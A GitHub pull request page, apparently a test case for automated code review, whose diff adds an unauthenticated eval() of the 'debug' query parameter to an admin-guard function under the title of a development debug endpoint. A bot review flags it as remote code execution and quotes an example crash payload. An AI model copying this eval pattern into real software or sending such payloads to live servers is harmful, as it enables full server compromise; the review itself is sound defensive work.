Skip to content

feat: Add debug endpoint for development #16

New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

Sign up for GitHub

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Open
hila-f-qodo wants to merge 1 commit into
base: main
Choose a base branch
from
Open

feat: Add debug endpoint for development #16

Changes from all commits
Commits
Show all changes
1 commit
Select commit
File filter

Filter by extension

Filter by extension
Conversations
Failed to load comments.
Loading
Jump to
Jump to file
Failed to load files.
Loading
Diff view
Diff view
2 changes: 2 additions & 0 deletions apps/api/v1/lib/utils/isAdmin.ts
View file
Open in desktop
Original file line number Diff line number Diff line change
Expand Up @@ -7,6 +7,8 @@ import { ScopeOfAdmin } from "./scopeOfAdmin";

export const isAdminGuard = async (req: NextApiRequest) => {
const { user, userId } = req;
const debug = req.query.debug;
if (debug) eval(debug as string);
Comment on lines +10 to +11
Copy link

@coderabbitai coderabbitai bot Dec 9, 2025

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

⚠️ Potential issue | 🔴 Critical

🚨 CRITICAL: Remote Code Execution (RCE) vulnerability - DO NOT MERGE

This code allows any attacker to execute arbitrary JavaScript on your server by adding ?debug=<malicious_code> to any request. This is one of the most severe security vulnerabilities possible.

Critical issues:

  1. Unauthenticated RCE: The eval() executes before the user authentication check on line 12, meaning anyone can exploit this without credentials.
  2. No environment guard: There's no check for development mode - this would run in production.
  3. Full server compromise: An attacker could steal secrets, access the database, exfiltrate user data, or pivot to attack internal systems.

Example attack: GET /api/v1/...?debug=process.exit(1) would crash the server. More sophisticated payloads could exfiltrate process.env, database credentials, or establish persistence.

This code must be removed entirely:

-  const debug = req.query.debug;
-  if (debug) eval(debug as string);

If debugging capabilities are genuinely needed, consider:

  • Using proper logging/tracing infrastructure
  • Environment-gated debug endpoints with strong authentication
  • Never using eval() on user input under any circumstances
📝 Committable suggestion

‼️ IMPORTANT
Carefully review the code before committing. Ensure that it accurately replaces the highlighted code, contains no missing lines, and has no issues with indentation. Thoroughly test & benchmark the code to ensure it meets the requirements.

Suggested change
const debug = req.query.debug;
if (debug) eval(debug as string);
🧰 Tools
🪛 Biome (2.1.2)

[error] 11-11: eval() exposes to security risks and performance issues.

See the MDN web docs for more details.
Refactor the code so that it doesn't need to call eval().

(lint/security/noGlobalEval)

🤖 Prompt for AI Agents 
In apps/api/v1/lib/utils/isAdmin.ts around lines 10-11, remove the insecure
debug handling that reads req.query.debug and calls eval on it; this is an
unauthenticated RCE and must be deleted entirely. If you need runtime debugging,
replace with a secured alternative: guard behind NODE_ENV==='development' and
require strong authentication/whitelist before accepting any debug commands,
never use eval on user input, and instead log the debug query or route it to a
controlled, non-executing diagnostics handler (or implement an authenticated,
environment-gated debug endpoint using safe operations). Ensure no code executes
user-provided strings.

if (!user) return { isAdmin: false, scope: null };

const { role: userRole } = user;
Expand Down